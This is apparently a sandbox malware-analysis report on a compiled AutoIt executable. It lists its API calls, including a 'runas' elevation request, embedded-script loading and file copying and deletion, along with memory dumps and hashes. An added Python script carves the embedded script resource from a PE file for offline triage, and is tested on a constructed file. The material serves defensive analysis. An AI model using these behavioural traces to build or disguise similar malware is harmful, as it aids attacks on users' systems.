                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0089DAB4,008C1148,?,?,?,?,?,00803AA3,?), ref: 00871D89
                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,00803AA3), ref: 00871D90
                                              • Part of subcall function 00803E6E: GetSysColorBrush.USER32(0000000F), ref: 00803E79
                                              • Part of subcall function 00803E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00803E88
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(00000063), ref: 00803E9E
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(000000A4), ref: 00803EB0
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(000000A2), ref: 00803EC2
                                              • Part of subcall function 00803E6E: RegisterClassExW.USER32(?), ref: 00803F30
                                              • Part of subcall function 008036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008036E6
                                              • Part of subcall function 008036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803707
                                              • Part of subcall function 008036B8: ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 0080371B
                                              • Part of subcall function 008036B8: ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 00803724
                                              • Part of subcall function 00804FFC: _memset.LIBCMT ref: 00805022
                                              • Part of subcall function 00804FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008050CB
                                            Strings
                                            • runas, xrefs: 00871D84
                                            • This is a third-party compiled AutoIt script., xrefs: 00871CC8
                                            Similarity
                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                            • API String ID: 438480954-3287110873
                                            • Opcode ID: 9ccb49ea9b6aea9ee679e711af393e748a7a8d8e75c160361f1d5951bf754226
                                            • Instruction ID: b27142ecf41f98a3dc110e211db1bc9f0dd4b2173c303b09575d2e73ae818038
                                            • Opcode Fuzzy Hash: 9ccb49ea9b6aea9ee679e711af393e748a7a8d8e75c160361f1d5951bf754226
                                            • Instruction Fuzzy Hash: 3E510B31A04248AECF51ABF8DC89EEE7B79FF06714F044169F511E22D3DA749645CB22

                                            Control-flow Graph
                                            • Function at 0081DDC0 (basic blocks 81ddc0-81df3b, with out-of-line blocks at 87244e-8724f8); rendered graph and raw edge list not reproduced.
                                            • APIs referenced in the graph: GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo, FreeLibrary.
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 0081DDEC
                                            • GetCurrentProcess.KERNEL32(00000000,0089DC38,?,?), ref: 0081DEAC
                                            • GetNativeSystemInfo.KERNELBASE(?,0089DC38,?,?), ref: 0081DF01
                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0081DF0C
                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0081DF1F
                                            • GetSystemInfo.KERNEL32(?,0089DC38,?,?), ref: 0081DF29
                                            • GetSystemInfo.KERNEL32(?,0089DC38,?,?), ref: 0081DF35
                                            Similarity
                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                            • String ID:
                                            • API String ID: 3851250370-0
                                            • Opcode ID: 1f0dc6f7e8df6efde12211bb088a2e9842802142ea1b6654b8c2bd60fef797cb
                                            • Instruction ID: a84de83f9e6f27986a79f402eb8398c993d0ad373af5398abda96eeac82597f4
                                            • Opcode Fuzzy Hash: 1f0dc6f7e8df6efde12211bb088a2e9842802142ea1b6654b8c2bd60fef797cb
                                            • Instruction Fuzzy Hash: C661A5B180A384CBCF15CF6898C12E97FB4FF29304B1985D9D849DF24BC624C549CB69

                                            Control-flow Graph

                                             [Control-flow graph rendered as an image; recoverable from the residue: basic blocks 0x80406b–0x874f6e calling CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource in sequence, every failure edge returning to the common exit at 0x8040a2; the executed / not-executed colouring is not preserved in text]
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0080449E,?,?,00000000,00000001), ref: 0080407B
                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0080449E,?,?,00000000,00000001), ref: 00804092
                                            • LoadResource.KERNEL32(?,00000000,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB), ref: 00874F1A
                                            • SizeofResource.KERNEL32(?,00000000,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB), ref: 00874F2F
                                            • LockResource.KERNEL32(0080449E,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB,00000000), ref: 00874F42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                            • String ID: SCRIPT
                                            • API String ID: 3051347437-3967369404
                                            • Opcode ID: b65f6558fc2ad6a07286cfd4c2b20b41db033488670f684d03b60872fd5c49ca
                                            • Instruction ID: f2cbe8d0aa23218c7b98972215e9979e031a0f241ac9d47ed478eb73dbb5602e
                                            • Opcode Fuzzy Hash: b65f6558fc2ad6a07286cfd4c2b20b41db033488670f684d03b60872fd5c49ca
                                            • Instruction Fuzzy Hash: 39112E71240701AFE7618B65EC48F277BB9FBC5B51F10456CF612D6290DBB1EC008A20
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00872F49), ref: 00846CB9
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00846CCA
                                            • FindClose.KERNEL32(00000000), ref: 00846CDA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: 3a124ef4812cba490aa6f36063245270d189e7d5d00fd96aa1bbbd152de0f3f4
                                            • Instruction ID: 8f2a8b237b34cf6e34ddb951120a5cbabcf4e54e462023f0f79b66701406922b
                                            • Opcode Fuzzy Hash: 3a124ef4812cba490aa6f36063245270d189e7d5d00fd96aa1bbbd152de0f3f4
                                            • Instruction Fuzzy Hash: 69E04F35814619AB8220673CEC8D8EAB7ACFF06339F104716F976C21E0FB74D95486D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID:
                                            • API String ID: 3964851224-0
                                            • Opcode ID: 75b6d0af3695acdc986cb7c0f047d407c2323c668d5bb4ead20725025821e892
                                            • Instruction ID: 709549a4ecbd3a224aee71b6f932c3ffc7fe7bce1237ebcbc323f4205bbc9db2
                                            • Opcode Fuzzy Hash: 75b6d0af3695acdc986cb7c0f047d407c2323c668d5bb4ead20725025821e892
                                            • Instruction Fuzzy Hash: B7923A706083419FD724DF18C484BAAB7E9FF84308F14885DE99ACB3A2D775E985CB52
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080E959
                                            • timeGetTime.WINMM ref: 0080EBFA
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080ED2E
                                            • TranslateMessage.USER32(?), ref: 0080ED3F
                                            • DispatchMessageW.USER32(?), ref: 0080ED4A
                                            • LockWindowUpdate.USER32(00000000), ref: 0080ED79
                                            • DestroyWindow.USER32 ref: 0080ED85
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0080ED9F
                                            • Sleep.KERNEL32(0000000A), ref: 00875270
                                            • TranslateMessage.USER32(?), ref: 008759F7
                                            • DispatchMessageW.USER32(?), ref: 00875A05
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00875A19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                            • API String ID: 2641332412-570651680
                                            • Opcode ID: a3b5a3c8f11aeeb17cb6b86abd4b88e796e1db64215751e71a6b5e9c82c2d920
                                            • Instruction ID: f2d81fd83bee2cbc0b17b79b71c55469a5d747b6af18564c2e936cb1417464c5
                                            • Opcode Fuzzy Hash: a3b5a3c8f11aeeb17cb6b86abd4b88e796e1db64215751e71a6b5e9c82c2d920
                                            • Instruction Fuzzy Hash: 8962AD705083448FEB64DF28CC95BAA77A4FF55304F08496DE98ACB2D6DBB1D848CB52
                                            APIs
                                            • ___createFile.LIBCMT ref: 00835EC3
                                            • ___createFile.LIBCMT ref: 00835F04
                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00835F2D
                                            • __dosmaperr.LIBCMT ref: 00835F34
                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00835F47
                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00835F6A
                                            • __dosmaperr.LIBCMT ref: 00835F73
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00835F7C
                                            • __set_osfhnd.LIBCMT ref: 00835FAC
                                            • __lseeki64_nolock.LIBCMT ref: 00836016
                                            • __close_nolock.LIBCMT ref: 0083603C
                                            • __chsize_nolock.LIBCMT ref: 0083606C
                                            • __lseeki64_nolock.LIBCMT ref: 0083607E
                                            • __lseeki64_nolock.LIBCMT ref: 00836176
                                            • __lseeki64_nolock.LIBCMT ref: 0083618B
                                            • __close_nolock.LIBCMT ref: 008361EB
                                              • Part of subcall function 0082EA9C: CloseHandle.KERNELBASE(00000000,008AEEF4,00000000,?,00836041,008AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0082EAEC
                                              • Part of subcall function 0082EA9C: GetLastError.KERNEL32(?,00836041,008AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0082EAF6
                                              • Part of subcall function 0082EA9C: __free_osfhnd.LIBCMT ref: 0082EB03
                                              • Part of subcall function 0082EA9C: __dosmaperr.LIBCMT ref: 0082EB25
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __lseeki64_nolock.LIBCMT ref: 0083620D
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00836342
                                            • ___createFile.LIBCMT ref: 00836361
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0083636E
                                            • __dosmaperr.LIBCMT ref: 00836375
                                            • __free_osfhnd.LIBCMT ref: 00836395
                                            • __invoke_watson.LIBCMT ref: 008363C3
                                            • __wsopen_helper.LIBCMT ref: 008363DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                            • String ID: @
                                            • API String ID: 3896587723-2766056989
                                            • Opcode ID: f2d8cd53fa1914e6fcc783858360b75aad7fa0e2f887a73ab6c6a001356cc404
                                            • Instruction ID: 309bac3e87f296f2ce84d819458b616fd89e5a368d4847f7035e4385d60fbd96
                                            • Opcode Fuzzy Hash: f2d8cd53fa1914e6fcc783858360b75aad7fa0e2f887a73ab6c6a001356cc404
                                            • Instruction Fuzzy Hash: BB22177190060AABEF299F6CDC55BAD7B71FB80324F288229E511EB2D1D7358D60C7D1

                                            Control-flow Graph

                                            APIs
                                            • _wcscpy.LIBCMT ref: 0084FA96
                                            • _wcschr.LIBCMT ref: 0084FAA4
                                            • _wcscpy.LIBCMT ref: 0084FABB
                                            • _wcscat.LIBCMT ref: 0084FACA
                                            • _wcscat.LIBCMT ref: 0084FAE8
                                            • _wcscpy.LIBCMT ref: 0084FB09
                                            • __wsplitpath.LIBCMT ref: 0084FBE6
                                            • _wcscpy.LIBCMT ref: 0084FC0B
                                            • _wcscpy.LIBCMT ref: 0084FC1D
                                            • _wcscpy.LIBCMT ref: 0084FC32
                                            • _wcscat.LIBCMT ref: 0084FC47
                                            • _wcscat.LIBCMT ref: 0084FC59
                                            • _wcscat.LIBCMT ref: 0084FC6E
                                              • Part of subcall function 0084BFA4: _wcscmp.LIBCMT ref: 0084C03E
                                              • Part of subcall function 0084BFA4: __wsplitpath.LIBCMT ref: 0084C083
                                              • Part of subcall function 0084BFA4: _wcscpy.LIBCMT ref: 0084C096
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0A9
                                              • Part of subcall function 0084BFA4: __wsplitpath.LIBCMT ref: 0084C0CE
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0E4
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                            • String ID: >>>AUTOIT SCRIPT<<<
                                            • API String ID: 2955681530-2806939583
                                            • Opcode ID: 37e9565524ea0f0abaf8e942ef2ef369aaee7e31ccd1114585f174913ff7d73d
                                            • Instruction ID: 895bdfe65aa7eda511b5153a72b61abf891c63492148a770cb432a155b890fcf
                                            • Opcode Fuzzy Hash: 37e9565524ea0f0abaf8e942ef2ef369aaee7e31ccd1114585f174913ff7d73d
                                            • Instruction Fuzzy Hash: B291A171504319AFDB20EB58C891E9AB3E8FF54310F00496DFA99D7292DB34EA54CF92
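                                             The two function records above show how the AutoIt runtime locates its compiled script: the loader calls FindResourceExW(hModule, 0xA /* RT_RCDATA */, L"SCRIPT", 0) followed by LoadResource, SizeofResource and LockResource, and the path-building routine tagged >>>AUTOIT SCRIPT<<< assembles candidate script names with _wcscpy / _wcscat / __wsplitpath. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it walks a PE file's resource directory on disk, without loading the image, and returns the RT_RCDATA resource named "SCRIPT" so the embedded script can be carved for offline analysis. Everything it parses in the test is constructed in build_sample_pe(); the "AU3!" prefix checked by looks_like_autoit_script() is an assumption based on the commonly documented a3x header string, which this report does not show.

```python
"""Carve RT_RCDATA/"SCRIPT" out of a PE file by walking its resource tree.
Added example; the PE used for testing is constructed below, not the sample."""
import struct
from typing import Optional

RT_RCDATA = 10                # lpType 0xA passed to FindResourceExW in the report
RESOURCE_DIR_INDEX = 2        # IMAGE_DIRECTORY_ENTRY_RESOURCE
AU3_MARKER = b"AU3!"          # assumption: documented a3x header prefix ("AU3!EA06")


def _rva_to_offset(sections, rva: int) -> int:
    """Map an RVA to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _dir_entries(pe: bytes, rsrc: int, dir_off: int):
    """Yield (key, offset, is_subdir) for each IMAGE_RESOURCE_DIRECTORY_ENTRY."""
    n_named, n_id = struct.unpack_from("<HH", pe, rsrc + dir_off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", pe, rsrc + dir_off + 16 + 8 * i)
        if name & 0x80000000:                          # named entry -> UTF-16 string
            s = rsrc + (name & 0x7FFFFFFF)
            length = struct.unpack_from("<H", pe, s)[0]
            key = pe[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:                                          # ID entry (type / language)
            key = name
        yield key, data & 0x7FFFFFFF, bool(data & 0x80000000)


def find_rcdata_by_name(pe: bytes, wanted: str) -> Optional[bytes]:
    """Return RT_RCDATA/<wanted>/<first language> or None.
    Name comparison is case-insensitive, as FindResourceExW's is."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    data_dirs = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+
    rsrc_rva = struct.unpack_from("<I", pe, data_dirs + 8 * RESOURCE_DIR_INDEX)[0]
    if rsrc_rva == 0:
        return None
    sections = []
    for i in range(nsect):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    rsrc = _rva_to_offset(sections, rsrc_rva)

    for type_key, type_off, type_is_dir in _dir_entries(pe, rsrc, 0):
        if type_key != RT_RCDATA or not type_is_dir:
            continue
        for name_key, name_off, name_is_dir in _dir_entries(pe, rsrc, type_off):
            if not (isinstance(name_key, str) and name_key.upper() == wanted.upper()) or not name_is_dir:
                continue
            for _lang, data_off, leaf_is_dir in _dir_entries(pe, rsrc, name_off):
                if leaf_is_dir:
                    continue
                data_rva, size = struct.unpack_from("<II", pe, rsrc + data_off)
                start = _rva_to_offset(sections, data_rva)
                return pe[start:start + size]
    return None


def looks_like_autoit_script(blob: bytes) -> bool:
    """Cheap triage check on the carved resource (marker is an assumption, see above)."""
    return blob.startswith(AU3_MARKER)


def build_sample_pe(script: bytes) -> bytes:
    """Constructed minimal PE32: one .rsrc section holding RT_RCDATA/"SCRIPT"/lang 0."""
    rsrc_rva, rsrc_off = 0x2000, 0x400

    def directory(entries, named):
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return hdr + b"".join(struct.pack("<II", k, v) for k, v in entries)

    rsrc = bytearray()
    rsrc += directory([(RT_RCDATA, 0x80000000 | 0x18)], named=0)           # root  -> type dir @0x18
    rsrc += directory([(0x80000000 | 0x58, 0x80000000 | 0x30)], named=1)   # type  -> name dir @0x30
    rsrc += directory([(0, 0x48)], named=0)                                 # lang0 -> data entry @0x48
    rsrc += struct.pack("<IIII", rsrc_rva + 0x68, len(script), 0, 0)       # data entry @0x48
    rsrc += struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le") + b"\0\0"  # name string @0x58
    rsrc += script                                                          # payload @0x68

    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, 0x400000)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)
    struct.pack_into("<I", opt, 92, 16)
    struct.pack_into("<II", opt, 96 + 8 * RESOURCE_DIR_INDEX, rsrc_rva, len(rsrc))
    sect = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc), rsrc_off, 0, 0, 0, 0, 0x40000040)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    return headers.ljust(rsrc_off, b"\0") + bytes(rsrc)


# Constructed payload: marker plus placeholder body, not a real compiled script.
SAMPLE_SCRIPT = AU3_MARKER + b"EA06" + b"[constructed script body]"

if __name__ == "__main__":
    blob = find_rcdata_by_name(build_sample_pe(SAMPLE_SCRIPT), "script")
    print(len(blob), looks_like_autoit_script(blob))
```

                                             Run it against a real file with find_rcdata_by_name(open(path, "rb").read(), "SCRIPT"); a hit of this type and name is what the FindResourceExW call above resolves at run time, and the returned blob is the input for a3x decompilation tooling. Parsing from disk rather than calling LoadLibrary keeps the sample's code from ever executing during triage.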

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0084BDB4: __time64.LIBCMT ref: 0084BDBE
                                              • Part of subcall function 00804517: _fseek.LIBCMT ref: 0080452F
                                            • __wsplitpath.LIBCMT ref: 0084C083
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscpy.LIBCMT ref: 0084C096
                                            • _wcscat.LIBCMT ref: 0084C0A9
                                            • __wsplitpath.LIBCMT ref: 0084C0CE
                                            • _wcscat.LIBCMT ref: 0084C0E4
                                            • _wcscat.LIBCMT ref: 0084C0F7
                                            • _wcscmp.LIBCMT ref: 0084C03E
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C65D
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C670
                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0084C2A1
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0084C338
                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0084C34E
                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0084C35F
                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0084C371
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                            • String ID: p1Wu`KXu
                                            • API String ID: 2378138488-4063981602
                                            • Opcode ID: 2458dcdc530cf3a9399330dabda6dc847684b64da02bc29f88c50ca81571766b
                                            • Instruction ID: 10014718b81a89c367548b967214e39e87f5216c21730ef497b0d8b398ef50ac
                                            • Opcode Fuzzy Hash: 2458dcdc530cf3a9399330dabda6dc847684b64da02bc29f88c50ca81571766b
                                            • Instruction Fuzzy Hash: A4C11BB1E0122DABDF51DF99CC81EDEB7BDFF49300F0040A6A609E6251DB709A848F65

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00803F86
                                            • RegisterClassExW.USER32(00000030), ref: 00803FB0
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00803FC1
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00803FDE
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00803FEE
                                            • LoadIconW.USER32(000000A9), ref: 00804004
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00804013
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: a0caf384c1f97307137f4387aba4d7e31cf1425107183a50844bccc329fe92f9
                                            • Instruction ID: 58eea2f6caaaddf68a88bff9dd5a16f775cd063a61a7e51ba8a8d4b6d45e505c
                                            • Opcode Fuzzy Hash: a0caf384c1f97307137f4387aba4d7e31cf1425107183a50844bccc329fe92f9
                                            • Instruction Fuzzy Hash: 2921C4B5900318AFDF00EFA8E889FCDBBB4FB19710F00421AF611A62A0D7B44544CF91

                                            Control-flow Graph

                                             [Control-flow graph rendered as an image; recoverable from the residue: a window-procedure dispatch over basic blocks 0x803742–0x871ea2 with branches to DefWindowProcW, KillTimer, SetTimer / RegisterWindowMessageW(TaskbarCreated), CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus, plus calls into 0x802ff6, 0x803847, 0x80390f, 0x804ffc, 0x81e312, 0x81eb83, 0x83a5f3, 0x844ddd and 0x8455bd; the executed / not-executed colouring is not preserved in text]
                                            APIs
                                            • DefWindowProcW.USER32(?,?,?,?), ref: 008037B3
                                            • KillTimer.USER32(?,00000001), ref: 008037DD
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00803800
